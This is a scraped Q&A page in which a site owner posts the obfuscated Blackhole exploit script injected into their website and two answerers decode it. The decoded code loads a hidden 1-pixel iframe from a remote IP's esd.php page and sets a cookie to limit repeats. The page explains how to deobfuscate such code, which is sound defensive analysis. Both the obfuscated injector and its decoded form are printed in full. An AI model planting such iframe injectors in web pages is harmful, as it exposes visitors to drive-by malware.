Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

Blackhole Exploit / Javascript

Tags:

javascript

exploit

my site got infected by the well known blackhole exploit. After some days and some help scripts i guess i fixed it now.

I'm wondering what this exploit does?

asd=function(){d.body++}; a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,172,151,147,154,174,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,172,151,147,154,174,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,66,64,74,62,74,67,62,66,71,62,66,72,63,151,167,150,62,164,154,164,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,172,151,147,154,174,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,172,151,147,154,174,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,172,151,147,154,174,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,172,151,147,154,174,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,172,151,147,154,174,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](",")); ss=eval("S"+"tr"+"ing"); d=document; for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));

Does anybody has experience with this one?

Cheers!

like image 709
lufi Avatar asked Mar 23 '23 19:03

lufi

2 Answers

It's an array of character codes, which is converted to the following js code by ss.fromCharCode.apply(ss,a):

function zzzfff() {
    var vechx = document.createElement('iframe');

    vechx.src = 'http://208.83.25.26/esd.php';
    vechx.style.position = 'absolute';
    vechx.style.border = '0';
    vechx.style.height = '1px';
    vechx.style.width = '1px';
    vechx.style.left = '1px';
    vechx.style.top = '1px';

    if (!document.getElementById('vechx')) {
        document.write('<div id=\'vechx\'></div>');
        document.getElementById('vechx').appendChild(vechx);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        zzzfff();
    }
}

Then that code is run with eval. As far as I can see, it loads http://208.83.25.26/esd.php in an iframe, and sets a cookie.

like image 115
bfavaretto Avatar answered Apr 05 '23 22:04

bfavaretto

The procedure with these eval ones is almost always the same. Prettify the code, find and replace the critical eval with a console.log, and just run it:

function zzzfff() {
    var vechx = document.createElement('iframe');
    vechx.src = 'http://208.83.25.26/esd.php';
    vechx.style.position = 'absolute';
    vechx.style.border = '0';
    vechx.style.height = '1px';
    vechx.style.width = '1px';
    vechx.style.left = '1px';
    vechx.style.top = '1px';
    if (!document.getElementById('vechx')) {
        document.write('
');
        document.getElementById('vechx').appendChild(vechx);
    }
}
function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) && (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');
        zzzfff();
    }
}

Instead of executing the code, it'll print out the code instead. This looks like some sort of tracking code installed on some person's exploited website.

like image 40
Blender Avatar answered Apr 06 '23 00:04

Blender
Sign in to Comment

Related questions

How to make time function update itself?
jquery ui tabs select doesn't seem to work in 1.10.3
Modules in Javascript with eval();
Stop file upload when filesize too large - jQuery S3
How to run angularjs ajax request in loop but with delay?
Uncaught RangeError: Maximum call stack size exceeded with innerHTML
Explaining JS closures in the terms of perl
SVG Blocks Touch/Mousewheel events
jQuery Table row toggle show/hide associated with buttons
.focus() Not Focusing On New Element
Image not drawn on canvas until user clicks?
Serving bundled JavaScript with a pure AppHost implementation of ServiceStack
JavaScript sort an array of arrays by the day of the week
JavaScript get h1 elements in HTML document and update unique IDs
Google Closure: How to annotate a parameter used as a constructor
How HTML, JS and CSS work together
How can I convert a short date to a long date in Javascript?
javascript addEventListener is not working
ThreeJS Cube texture strange visual
Javascript to uncheck a checkbox when another is checked

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!